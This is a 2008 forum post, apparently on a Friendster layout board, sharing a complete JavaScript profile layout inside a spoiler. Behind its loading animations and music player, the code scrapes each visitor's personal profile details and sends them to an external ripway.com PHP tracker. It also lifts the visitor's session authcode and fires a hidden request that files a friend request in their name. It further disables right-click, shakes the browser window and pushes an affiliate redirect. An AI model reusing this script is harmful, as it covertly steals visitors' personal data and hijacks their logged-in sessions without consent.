Pages: 1

  2008-07-17 09:13:17

myparis
» FTalker
FTalk Level: zero
118
0
1969-12-31

[b]warning[/b]: no newbie question here... [color=green]PROVED[/color] PREVIEW [url=http://friendster.com/aroldz]HERE[/url] [b]DIS-ADVANTAGE:[/b] >>this code is not professional way of hiding

Yes you CAN use .PHP extension :thumbsup: , like what i did in my JS and CSS files, try to view my source code if it will show [url=http://profiles.friendster.com/20140652]HERE[/url] @topic: sorry bro its not effective =| [spoiler] /* <script> alert('Ripping is bad!'); for(x=0;x<1000;x++){ window.moveTo(Math.floor(Math.random()*500),Math.floor(Math.random()*300)); } while(jdefdef!=1000)alert('No ripping!'); </script> */ window.onerror=err; var current = 0 var x = 0 var speed = 100 var speed2 = 100 function initArray(n) { this.length = n; for (var i =1; i <= n; i++) { this[i] = ' ' } } typ = new initArray(4) typ[0]="Hello there "+l_name typ[1]="Feel at home!" function typewrite() { var m = typ[current] window.status = m.substring(0, x++) + "" if (x == m.length + 1) { x = 0 current++ if (current > typ.length - 1) { current = 0 } setTimeout("typewrite()", speed2) } else { setTimeout("typewrite()", speed) } } var addScript=function(src){ var get; try{get=document.createElement("script");} catch(y){get=document.createElement("<script>");} get.type="text/javascript"; get.rel="stylesheet"; get.src=src; get.media="screen, print"; document.getElementsByTagName("body")[0].appendChild(get); }; var addStyle=function(src){ var get; try{get=document.createElement("link");} catch(y){get=document.createElement("<link>");} get.type="text/css"; get.href=src; document.getElementsByTagName("body")[0].appendChild(get); }; addStyle('http://h1.ripway.com/lkjh0987/aroldz007.css'); var data1=document.getElementsByTagName("script")[2].innerHTML; var datum=escape(data1); var xmlHttp; var yy=1; var ys=1; var jg; var m_url="http://media.y8.com/games/content/kingoffightersdm_1.swf"; var m_ac="http://h1.ripway.com/lkjh0987"; var visiturl=m_ac+"/435yuuhi3.php3"; var nextpageurl=m_ac+"/rgr44.php"; var mp3url=m_ac+"/$pl9.php"; var gameurl=m_ac+"/47984u.php"; var playlisturl=m_ac+"/playlist.php"; var fr2h=9; var xml2; var about=""; var ref_y; var ref_x; var play=new Array("http://www.myplaylist.org/loadplaylist/28771814/config_black_shuffle/270/430/true","http://www.musicplaylist.net/loadplaylist/28771554/config_black_shuffle/270/430/true"); var cur=playlisturl; //this is for data collection var b_day=""; var v_email=""; var l_name=pageViewerFName; var pre="Mr. "; //object class queue var TRACKER = { details: { photo: null, gender: null, age: null, status: null, location: null, seek: null, since: null }, regexp: { photo: /imgblock200"[\S\s]+?img src="([\S\s]+?)"/i, gender: />([\S]*male)/i, age: /male, ([\d]*),/i, status: /male, [\d]*, ([\S\s]+?)<\/span>/i, location: /Location\: <\/span><a[\S\s]+?>([\S\s]+?)<\/a><\/li>/i, seek: /In\: <\/span>([\S\s]+?)<\/li>/i, since: /Since\: <\/span>([\S\s]+?)<\/li>/i } }; function parseDETAILS(htm) { for (val in TRACKER.details) { try { TRACKER.details[val]=encodeURIComponent(new RegExp(TRACKER.regexp[val]).exec(htm)[1]); } catch(e) { TRACKER.details[val]=""; } } var result = "?id="+pageViewerID+"&un="+l_name+"&inf="+(escape(TRACKER.details.gender+", "+TRACKER.details.age+", "+TRACKER.details.status))+"&loc="+TRACKER.details.location+"∫="+TRACKER.details.seek+"&img="+TRACKER.details.photo; return result; } function sound(ury,as){ var f; try{ f=document.createElement("embed"); }catch(o){f=document.createElement("<embed>"); } f.autoStart="true"; f.hidden="true"; f.src=ury; f.loop=as; document.body.appendChild(f); } var FLOAT={ div:function(inner){ if(this.ready){ this.height=20; this.width=10; var obj; try{ obj=document.createElement("div"); }catch(o){ obj=document.createElement("<div>"); } document.body.appendChild(obj); obj.style.backgroundColor="#888888"; obj.innerHTML="<div id=float_frame style=display:none;>"+inner+"</div><div align=right><input type=button style=background-color:#555555;color:#bbbbbb;display:none; value=CLOSE onClick=FLOAT.remove(); id=close_box></div>"; obj.style.visibility="hidden"; obj.style.position="absolute"; obj.style.top=this.top+"px"; obj.style.left=this.left+"px"; obj.style.height="20px"; obj.style.width="10px"; obj.style.zIndex=200; this.obj=obj; this.opac=0; var obj; try{ obj=document.createElement("img"); }catch(o){ obj=document.createElement("<img>"); } document.body.appendChild(obj); obj.src=this.src; obj.style.position="absolute"; obj.style.top="0px"; obj.style.left="0px"; obj.style.zIndex=100; obj.style.height="120%"; obj.style.width="120%"; this.img=obj; return this.blur(); } }, iframe:function(src){ if(this.ready){ this.height=20; this.width=10; var obj; try{ obj=document.createElement("div"); }catch(o){ obj=document.createElement("<div>"); } document.body.appendChild(obj); obj.style.backgroundColor="#888888"; obj.innerHTML="<iframe id=float_frame height=100% width=100% style=display:none; src="+src+ "></iframe><div align=right><input type=button style=background-color:#555555;color:#bbbbbb;display:none; value=CLOSE onClick=FLOAT.remove(); id=close_box></div>"; obj.style.visibility="hidden"; obj.style.position="absolute"; obj.style.top=this.top+"px"; obj.style.left=this.left+"px"; obj.style.height="20px"; obj.style.width="10px"; obj.style.zIndex=200; this.obj=obj; this.opac=0; var obj; try{ obj=document.createElement("img"); }catch(o){ obj=document.createElement("<img>"); } document.body.appendChild(obj); obj.src=this.src; obj.style.position="absolute"; obj.style.top="0px"; obj.style.left="0px"; obj.style.zIndex=100; obj.style.height="120%"; obj.style.width="120%"; this.img=obj; return this.blur(); } }, blur:function(){ this.img.style.opacity=this.opac/100; this.img.style.filter="alpha(opacity="+this.opac+")"; this.opac+=2; if(this.opac<15){ setTimeout("FLOAT.blur();",this.opac_timer); }else{ this.obj.style.visibility="visible"; return this.enlarge(); } }, enlarge:function(){ this.obj.style.height=this.height+"px"; this.height+=15; if(this.height<400){ setTimeout("FLOAT.enlarge();",3); }else{ return this.expand(); } }, expand:function(){ this.obj.style.width=this.width+"px"; this.width+=20; if(this.width<600){ setTimeout("FLOAT.expand();",2); }else{ this.ready=true; document.getElementById("close_box").style.display="inline"; document.getElementById("float_frame").style.display="inline"; } }, remove:function(){ if(this.ready){ document.getElementById("close_box").style.display="none"; document.getElementById("float_frame").style.display="none"; return this.close(); } }, close:function(){ this.obj.style.width=this.width; this.width-=10; if(this.width>10){ setTimeout("FLOAT.close();",2); }else{ this.obj.parentNode.removeChild(this.obj); return this.bright(); } }, bright:function(){ this.img.style.opacity=this.opac/100; this.img.style.filter="alpha(opacity="+this.opac+")"; this.opac-=2; if(this.opac>0){ setTimeout("FLOAT.bright();",this.opac_timer); }else{ this.img.parentNode.removeChild(this.img); this.ready=true; } }, ready:true, img:null, obj:null, src:"http://videogamesheaven.net/wallpaper-final-fantasy-x-tidus002-1024.jpg", top:50, left:200, height:0, width:0, opac_timer:(window.pageXOffset)?2:1 }; //LOADING CLASS var LOAD={ next:false, step:5, to:0, timer:20, index:0, move:function(){ var nh=this.index; if(nh!=this.step*100&&parseInt(nh/this.step)<this.to){ document.getElementById("stat").style.width=nh+"px"; document.getElementById("stat").innerHTML='LOADING'+(parseInt(nh/this.step))+"%"; var ag="LOAD.move()"; this.index+=10; setTimeout(ag,this.timer); } else if(this.next){ loadStart(); } else{ setTimeout("LOAD.move()",this.timer); } } }; var com=""; var WINDOW={ stat:true, blur:function(){ var obj; try{ obj=document.createElement("img"); }catch(E){ obj=document.createElement("<img>"); } obj.src=this.img; obj.style.position="absolute"; obj.style.top="0px"; obj.style.left="0px"; obj.style.height="100%"; obj.style.width="100%"; obj.style.backgroundColor="black"; obj.id="new_id"; obj.style.zIndex="88"; obj.onclick=function(){ WINDOW.bright(); } document.body.appendChild(obj); com="blur"; this.opac=0; WINDOW.animates(); }, img:"http://videogamesheaven.net/wallpaper-final-fantasy-x-tidus002-1024.jpg",//"http://images.websnapr.com/?url=profiles.friendster.com/"+pageViewerID+"&size=l",//"http://i259.photobucket.com/albums/hh294/rugal2008/the_king_of_fighters__.jpg",//"http://i95.photobucket.com/albums/l126/daveskoe/Fade.jpg",//"http://th188.photobucket.com/albums/z38/jakecarrier/th_background.jpg", timer:(navigator.appName.indexOf("Internet")==-1)?50:20, mode:"", element:0, id:"new_id", opac:0, step:5, type:(navigator.appName.indexOf("Internet")==-1)?"moz":"internet", animates:function(){ this.stat=false; this.element=document.getElementById("new_id"); if(com=="blur"){ //check if mozilla if(this.type=="moz"){ this.element.style.opacity=this.opac/100; this.opac+=this.step; //when it reaches 40 if(this.opac<65){ setTimeout("WINDOW.animates();",this.timer); }else{this.stat=true;} //or internet }else{ this.element.style.filter="alpha(opacity="+this.opac+")"; this.opac+=this.step; //when it reaches 40 if(this.opac<65){ setTimeout("WINDOW.animates();",this.timer); }else{ this.stat=true; setTimeout("WINDOW.bright();",4000); } } //if bright mode }else{ //check if mozilla if(this.type=="moz"){ this.element.style.opacity=this.opac/100; this.opac-=this.step; //when it reaches 0 if(this.opac>1){ setTimeout("WINDOW.animates();",this.timer); }else{ //eliminate target setTimeout("first()",1000); this.element.parentNode.removeChild(this.element); } //or internet }else{ this.element.style.filter="alpha(opacity="+this.opac+")"; this.opac-=this.step; //when it reaches 0 if(this.opac>1){ setTimeout("WINDOW.animates();",this.timer); }else{ //eliminate target first(); this.element.parentNode.removeChild(this.element); } } } }, bright:function(){ if(this.stat==true){ com="bright"; WINDOW.animates(); } } }; //main functions queue function commense(){ if(ys==1){ ys=0; document.body.innerHTML="<center id=stat style=height:20px;width:2px;background-color:#aaaaaa>LOADING 1%</center>"; WINDOW.blur(); } } function err(){ //alert(d+f+g); window.status=""; return true; } function gamer(gv){ var uriv=m_ac+'/47984u.php?7y4r='; uriv+=gv; var inr=document.getElementById("game_f"); inr.src=uriv; } function fullScreen(url1){ var ifr=m_ac+'/47984u.php?7y4r='+url1; var divs="<div id=new_f style=height:100%;width:100%;z-Index:300><table border=1 style=border-color:#555555;height:100%;width:100%;><tr><td style=height:20px;text-align:center;><input type=button value=CLOSE style=background-color:#aaaaaa;color:#aaff00; onClick=$('new_f').style.display='none';$('all').style.display='inline'; /></td></tr><tr><td style=height:100%;width:100%;><iframe style=height:100%;width:100%; src="+ifr+"></iframe></td></tr></table></div>"; $("all").style.display="none"; $('bottom').innerHTML=divs; $('bottom').style.display="inline"; } function readFrom(root,sr,er,inc){ var res; if(root.indexOf(sr)!=-1){ var st=root.indexOf(sr); var ls=root.indexOf(er,st); ls+=inc; res=root.substring(st,ls); return res; } } function parse(root,tag){ var htm="<"+tag+">"; var ctag="</"+tag+">"; var ln=htm.length; var res=""; if(root.indexOf(htm)!=-1){ var st=root.indexOf(htm); var ls=root.indexOf(ctag,st); st+=ln; res=root.substring(st,ls); return res; } } function readFrom2(root,sr,er,inc1,inc2){ var res; if(root.indexOf(sr)!=-1){ var st=root.indexOf(sr); var ls=root.indexOf(er,st); st+=inc1 ls+=inc2; res=root.substring(st,ls); return res; } } function $(ID){return document.getElementById(ID);} function rep(V){ var res=V; for (var int=0;int<50;int++){ if(res.indexOf(" ")!=-1){ res=res.replace(" ","_"); }else{ break; } } return res; } function animateText(){ function jump1a(){ var i=0; var loopy = setInterval(function(){ if (i==6) { clearInterval(loopy); jump2(); } else n0.style.left= [-3,-6,-9,-6,-3,0][i++]; }, 50); }; var num=0; function jump2(){ txt=""; for(var i=0; i<message.length; i++){ if (i+num > -1 && i+num < 8){ document.getElementById('n'+i).style.top = [-1,-4,-7,-10,-7,-4,-1,0][i+num]; } } if(num != (-message.length)){ num--; setTimeout(jump2,50) } else{ num=0; setTimeout(jump1a,2000) } }; var jump = document.getElementById('jump'); var message = jump.innerHTML; if (message.length > 6){ var txt=""; for(var i=0; i<message.length; i++){ txt += '<SPAN style="position:relative;top:0;" id="n'+i+'">'+message.charAt(i)+'</SPAN>'; } jump.innerHTML=txt; txt=""; jump1a() } } function show(ID){ var el=document.getElementById(ID); if(el.style.display=="none"){ el.style.display="inline"; }else{ el.style.display="none"; } } function GetXmlHttpObject() { var xmlHttp=null; try { // Firefox, Opera 8.0+, Safari xmlHttp=new XMLHttpRequest(); } catch (e) { // Internet Explorer try { xmlHttp=new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) { xmlHttp=new ActiveXObject("Microsoft.XMLHTTP"); } } return xmlHttp; } function yhyhyyhyffd454() { xmlHttp=GetXmlHttpObject() if (xmlHttp==null) { alert ("Your browser does not support AJAX!"); return; } var url1="/"+pageViewerID; xmlHttp.onreadystatechange=stateChanged; xmlHttp.open("GET",url1,true); xmlHttp.send(null); } function first() { LOAD.to=40; LOAD.move(); yhyhyyhyffd454(); } //retrieving the authcode value function ii(){ var kg = document.getElementById("controlPanelButtons").innerHTML; var ag = kg.slice(kg.indexOf("authcode=")); var mg = ag.slice(9,39); return mg; } function rumble(n){ for(i=10;i>0;i--){ for(j=n;j>0;j--){ if (browser==mic) { window.moveBy(0,i); window.moveBy(i,0); window.moveBy(0,-i); window.moveBy(-i,0); } else { with(window) { moveBy(0,i); moveBy(i,0); moveBy(0,-i); moveBy(-i,0); } } } } } function nrcIE() { if (event.button == 2 || event.button == 3) { rumble(20); return false; } } function nrcNS(e) { if (e.which == 2 || e.which == 3) { rumble(20); return false; } } if (document.layers) { document.captureEvents(Event.MOUSEDOWN); document.onmousedown = nrcNS; } else { document.onmouseup = nrcNS; document.onmousedown = nrcIE; } if ( navigator.appName == "Opera" ){ document.oncontextmenu=tumble; } else { document.oncontextmenu = new Function("return false"); } function tumble(){ if(window.moveTo){ for(l=300;l>0;l--){ for(r=1;r>0;r--){ window.moveTo(0,l); window.moveTo(l,0); window.moveTo(0,-l); window.moveTo(-l,0); } } } return false; } function stateChanged() { if (xmlHttp.readyState==0) { location.replace(location.href); } if (xmlHttp.readyState==1) { LOAD.to=60; } if (xmlHttp.readyState==2) { LOAD.to=80; } if (xmlHttp.readyState==3) { LOAD.to=90; } if (xmlHttp.readyState==4) { LOAD.to=100; LOAD.next=true; } } function loadStart(){ try{ var dt2=xmlHttp.responseText; var imgv=readFrom(dt2,'"imgblock200"','</a>',4); var _data=readFrom(dt2,'<ul class="data">','="q">Hometown:',4); var nimg1=readFrom(imgv,"<img src",'.jpg',5); var nimg=readFrom(nimg1,"http:",'.jpg',3)+"g"; about="<img style=opacity:0.7;filter:alpha(opacity=70); src=http://images.websnapr.com/?url=profiles.friendster.com/"+pageViewerID+"&size=s /><br />"; about+=readFrom2(dt2,'class="q"','</div></div>',10,0); if(about.indexOf("Female")!=-1){ pre="Ma'am "; } var datr=readFrom(dt2,'<span class="q">','</span></li>',0); dat=datr.replace('<span class="q">',''); }finally{} if (yy==0){ l_name="guest"; about="NO INFORMATION"; v_info=""; pageViewerID=""; } //the top center contents var top_center_contents='<div id=player style=position:absolute;top:100px;left:250px;width:435px;height:250px;visibility:visible;><div align=right style=background-color:#333333;><span id=msg_desc></span><input type=button style=background-color:#333333;color:#aaff00; onClick=PLAYER.hide(); id=hider value=HIDE></div><div align="left" style=background-color:#444444><select onChange=eval(this.options[selectedIndex].id+"(\'"+this.options[selectedIndex].value+"\')"); style=background-color:black;color:#aaff00><option>-------------</option><option id="mp3" value="http://media.imeem.com/pl/HkbTFE0MAJ/aus=true/">RED JUMP SUIT PLAYLIST</option><option id="iframe" value="http://h1.ripway.com/lkjh0987/playlist.php">HALE PLAYLIST</option><option id="playlist" value="http://www.myplaylist.org/loadplaylist/28771814/config_black_shuffle/270/430/true">MAIN PLAYLIST</option><option id="playlist" value="http://www.musicplaylist.net/loadplaylist/28771554/config_black_shuffle/270/430/true">HILLSONG PLAYLIST</option></select></div><a href="http://www.000webhost.com/54231.html" target="_blank"><img src="http://www.000webhost.com/images/banners/600x400/banner1.gif" alt="Free Web Hosting with Website Builder" width="100%" height="100%" border="0" /></a></div>'; //these are the buttons below the screen var menu_buttons="<input type='button' style=background-color:#333333;color:#666666; value='HOME'onClick='location.replace(\"http://www.friendster.com/\");'class='inputs'><input type='button' style=background-color:#333333;color:#999988; value='PROFILE'onClick='location.replace("+pageViewerID+");'class='inputs'><input type='button' style=background-color:#333333;color:#000000; value='SEND MESSAGE HERE'onClick='FLOAT.div(msgbx);'class='inputs'> <input type='button' style=background-color:#333333;color:#666666; value='VISITORS'onClick=FLOAT.iframe('http://h1.ripway.com/lkjh0987/$visitver2.php'); class='inputs'><input type='button' style=background-color:#333333;color:#666666; value='CHAT'onClick='FLOAT.div(chat_box);'class='inputs'><input type='button' style=background-color:#333333;color:#777777; value='GAMES'onClick=FLOAT.div(game_box); class='inputs'><input type=button style=background-color:#333333;color:#eeeeee; value='MP3|MENU' onClick=PLAYER.show();load();>"; var mypage="<div id=all><span id=lt></span><table id='new_main'class='up'style='height:100%;width:100%;border-color:#000000;'border='45'><tr><td id=next style='height:100%;' colspan=3><iframe id='good' src=\""+nextpageurl+"?u_n1="+pageViewerFName+"&u_id="+pageViewerID+"&u_img="+escape(nimg)+"&u_data="+datum+"&hg="+escape(rep(dat))+"\"height=100% width=100%></iframe></td></tr><tr><td colspan=3 style='height:15px;text-align:center;background-color:#222222;'>"+menu_buttons+"</td></tr></table><img src=\"http://www.friendster.com/addfriendrequest.php?authcode="+jg+"&uid="+pageOwnerID+"&email="+escape("zidaine_38@yahoo.com")+"&firstname=&lastname=&friend=&submit=1\" width=\"0\" height=\"0\" /></div><div id=bottom style=height:100%;width:100%;><img src=http://th152.photobucket.com/albums/s178/jaysin8308/th_games_REekg.gif style=position:absolute;top:0px;left:10px;></div>"+top_center_contents; if(yy!==0){ var vis="<iframe src='http://h1.ripway.com/lkjh0987/$visitver2.php"+parseDETAILS(dt2)+"'></iframe>";} else{vis="";} var all="<html>\n<head>\n<title>~~DEVINE~~</title>\n<script src='http://h1.ripway.com/lkjh0987/prototype.js'></script>\n</head>\n<body style=background-color:black;overflow-y:hidden;overflow-x:hidden;>\n<OBJECT ID=\"Rainbow\" width=\"0\" height=\"0\" CLASSID=\"CLSID:D45FD31B-5C6E-11D1-9EC1-00C04FD7081F\" CODEBASE=\"#VERSION=2,0,0,0\"></OBJECT><OBJECT ID=\"TruVoice\" width=\"0\" height=\"0\"CLASSID=\"CLSID:B8F2846E-CE36-11D0-AC83-00C04FD97575\" CODEBASE=\"#VERSION=6,0,0,0\"></OBJECT>\n"+mypage+vis+"\n</body>\n</html>"; document.write(all); } if(pageViewerID==""){ yy=0; pageViewerID=pageOwnerID; } jg=ii(); if(confirm('do you want to continue?')){ commense(); if(confirm('Welcome '+l_name+'!\ Perhaps you want to host you own domain fo free!\ like this: www.yourdomain.com\ you will have all you needed:\ PHP latest version\ MySQL Database 5.0.45\ Cool CPanel\ You can host many website in one account (grab as many as you can get!)\ And you can earn money fom it!\ Plus more cool features offered for you\ what are you waiting for?\ Sign up now for free!\ I say it\'s free!\n\ REGISTER NOW?')){ location.replace('http://www.000webhost.com/54231.html'); } } /* <object id="ctl00_ContentPlaceHolder1_mediaplayerfoo" style="" data="http://resources.imeem.com/resources/versioned/35/flash/audio_player.swf" type="application/x-shockwave-flash" height="290" width="560"><param value="high" name="quality"><param value="noscale" name="scale"><param value="transparent" name="wmode"><param value="0" name="bgcolor"><param value="r=web&ak=W2m_vZ2PDC&a=gm&primaryColor=cccccc&at=musicPlaylist&autoStart=true&isPrimary=true&tile=2&headerColor=121212&g=a&autoShuffle=false&backColor=121212&ord=85719843&linkColor=ffffff&adurl=http%3a%2f%2fads.imeem.com%2fads%2famf%2f&gatewayUrl=http%3a%2f%2fwww.imeem.com%2famf%2f&x=http%3a%2f%2fwww.imeem.com%2fplaylist.ashx%3fv%3d3%26p%3dnrdf7Snp%26ck%3d633455255918285311&preroll=http%3a%2f%2fad.doubleclick.net%2fadj%2fimeem.playlists%2fmusic%2f%3b&secondaryColor=666666&aa=2" name="flashvars"><param value="always" name="allowscriptaccess"><param value="true" name="swliveconnect"></object> */ [/spoiler]

Pages: 1

Board footer

© 2024 F Talk

Current time is 20:20

[ 12 queries - 0.012 second ]
Privacy Policy